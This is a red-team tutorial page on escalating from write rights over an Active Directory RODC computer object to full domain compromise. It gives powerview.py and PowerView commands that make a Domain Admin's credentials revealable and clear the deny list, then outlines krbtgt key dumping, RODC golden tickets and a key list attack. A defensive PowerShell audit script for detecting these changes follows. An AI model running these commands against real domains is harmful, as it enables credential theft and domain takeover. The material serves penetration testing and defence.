# Rights on RODC object

With administrative control over the [RODC](https://red.infiltr8.io/ad/movement/domain-settings/rodc) computer object in Active Directory, there is a path to full domain compromise. The RODC's `msDS-NeverRevealGroup` and `msDS-RevealOnDemandGroup` attributes can be modified so that a Domain Admin's credentials are allowed to be revealed to the RODC, where they can then be dumped via administrative access over the RODC host.

{% hint style="info" %}
For more granularity, any one of the following ACEs on the RODC object is sufficient as a starting point, since each implicitly grants `WriteProperty` over the `msDS-RevealOnDemandGroup` and `msDS-NeverRevealGroup` attributes:

* `GenericWrite`
* `GenericAll` / `FullControl`
* `WriteDacl` (the attacker can modify the DACL and obtain arbitrary permissions)
* `Owns` (c.f. `WriteDacl`)
* `WriteOwner` (i.e. the attacker can obtain `Owns` -> `WriteDacl` -> other permissions)
* `WriteProperty` against the `msDS-RevealOnDemandGroup` attribute, in conjunction with another primitive to gain privileged access to the host. `WriteProperty` against the `msDS-NeverRevealGroup` attribute may also be required if that attribute includes the target account.
{% endhint %}

{% tabs %}
{% tab title="UNIX-like" %}
From UNIX-like systems, the Python port of PowerView, [powerview.py](https://github.com/aniqfakhrul/powerview.py), can be used to modify the LDAP attributes.

```bash
powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"

# First, set msDS-RevealOnDemandGroup to a domain admin account
# Then, append the default Allowed RODC Password Replication Group
PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'

# If needed, clear the msDS-NeverRevealGroup attribute so the admin is no longer denied
PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
```

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](https://red.infiltr8.io/ad/movement/kerberos/forged-tickets/rodc-golden-tickets) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (PowerShell) can be used for this purpose.

```powershell
# Set msDS-RevealOnDemandGroup to the default Allowed RODC Password Replication Group plus a domain admin account
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}

# If needed, clear the msDS-NeverRevealGroup attribute so the admin is no longer denied
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
```

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](https://red.infiltr8.io/ad/movement/kerberos/forged-tickets/rodc-golden-tickets) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}
{% endtabs %}
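As an added defensive counterpart to the technique above (this audit script is not part of the original page nor of either PowerView project), the following PowerShell reports, for every RODC in the domain, which principals its `msDS-RevealOnDemandGroup` / `msDS-NeverRevealGroup` attributes currently allow or deny, and which allow ACEs on the RODC computer object carry one of the rights listed in the hint. It assumes the RSAT `ActiveDirectory` module and a Tier-0 name list (`$tier0`) and an expected-principal list (`$expected`) that you adapt to your environment.

```powershell
# Audit RODC reveal lists and the ACEs that could rewrite them (added example, not the page's code).
Import-Module ActiveDirectory

# Resolve the schemaIDGUIDs of both attributes so property-specific WriteProperty ACEs can be matched.
$schemaNC  = (Get-ADRootDSE).schemaNamingContext
$attrGuids = @{}
foreach ($name in 'msDS-RevealOnDemandGroup', 'msDS-NeverRevealGroup') {
    $s = Get-ADObject -SearchBase $schemaNC -LDAPFilter "(lDAPDisplayName=$name)" -Properties schemaIDGUID
    $attrGuids[[guid]$s.schemaIDGUID] = $name
}

# Assumption: Tier-0 principals that must never be revealable to an RODC; adapt to the environment.
$tier0    = @('Administrator', 'krbtgt', 'Domain Admins', 'Enterprise Admins', 'Administrators')
# Assumption: principals expected to hold broad rights on DC objects by default; everything else is flagged.
$expected = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators', 'Domain Admins', 'Enterprise Admins')

$R = [System.DirectoryServices.ActiveDirectoryRights]
$broadRights = $R::GenericAll -bor $R::GenericWrite -bor $R::WriteDacl -bor $R::WriteOwner

foreach ($rodc in Get-ADDomainController -Filter { IsReadOnly -eq $true }) {
    $obj = Get-ADComputer -Identity $rodc.ComputerObjectDN -Properties 'msDS-RevealOnDemandGroup', 'msDS-NeverRevealGroup'
    Write-Host "== $($obj.DistinguishedName)"

    # 1. Tier-0 principals in the reveal list, or an emptied deny list, are the attribute changes described above.
    foreach ($dn in $obj.'msDS-RevealOnDemandGroup') {
        $cn = (($dn -split ',')[0]) -replace '^CN=', ''      # naive RDN split; DNs with escaped commas need a parser
        if ($tier0 -contains $cn) { Write-Warning "Tier-0 principal is revealable on demand: $dn" }
    }
    if (-not $obj.'msDS-NeverRevealGroup' -or $obj.'msDS-NeverRevealGroup'.Count -eq 0) {
        Write-Warning 'msDS-NeverRevealGroup is empty: the default deny list has been cleared'
    }

    # 2. Allow ACEs that grant one of the hint's rights (or WriteProperty on these attributes) to an unexpected principal.
    $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"
    Write-Host "Owner: $($acl.Owner)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($expected | Where-Object { $who -like "*$_" }) { continue }
        $broad = (($ace.ActiveDirectoryRights -band $broadRights) -ne 0)
        $prop  = (($ace.ActiveDirectoryRights -band $R::WriteProperty) -ne 0) -and
                 ($ace.ObjectType -eq [guid]::Empty -or $attrGuids.ContainsKey($ace.ObjectType))
        if ($broad -or $prop) {
            $scope = if ($attrGuids.ContainsKey($ace.ObjectType)) { $attrGuids[$ace.ObjectType] } else { 'whole object' }
            Write-Warning ("{0} holds {1} on {2}" -f $who, $ace.ActiveDirectoryRights, $scope)
        }
    }
}
```

Run it from a domain-joined host with read access to the RODC objects; the `Owner` line matters because ownership implies `WriteDacl` as the hint notes, so an unexpected owner is as significant as an unexpected ACE.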

## References

{% embed url="https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06" %}
